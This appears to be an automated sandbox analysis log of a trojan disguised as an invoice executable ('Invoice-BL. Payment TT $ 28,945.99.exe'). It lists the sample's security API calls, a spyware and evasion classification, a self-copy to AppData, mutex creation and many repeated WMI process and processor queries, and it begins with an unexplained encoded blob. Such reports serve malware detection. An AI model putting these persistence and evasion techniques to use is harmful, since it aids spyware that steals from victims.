'xYuvE6ES2q02iyx0gj+TcxpQsqddzdkIJrpkxnhqM1VY6AGnW9K7iueX76+kb51aZY1MQHOImE+WAxBe/9TWW8PghqnYJs+uiWFcbqIrt7wBNgYAZIb4fWIYK6I8PvGWTdMT0vp5d1eejCO3WE2kAMEeZpGjb68AQ5PP+dh1Wp3O0VUq7s2iJGVMSVGN135sxYJU8wDgauyFnkLJSJeLk1O3e5wj8ldO2VmBZYAsUnmHz13Us3I3PoAxFiTxlTLjhRP

Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, xOrxTajS3eLdlREM37.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, C0iQR0D43d47cjyFBd.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, C0iQR0D43d47cjyFBd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, C0iQR0D43d47cjyFBd.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, xOrxTajS3eLdlREM37.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, C0iQR0D43d47cjyFBd.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, C0iQR0D43d47cjyFBd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, C0iQR0D43d47cjyFBd.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, C0iQR0D43d47cjyFBd.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, C0iQR0D43d47cjyFBd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, C0iQR0D43d47cjyFBd.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.a640000.5.raw.unpack, xOrxTajS3eLdlREM37.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@48/235@5/4

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

File created: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

File created: C:\Users\user\AppData\Local\Temp\tmp532A.tmp

Jump to behavior

Source: Invoice-BL. Payment TT $ 28,945.99.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Invoice-BL. Payment TT $ 28,945.99.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
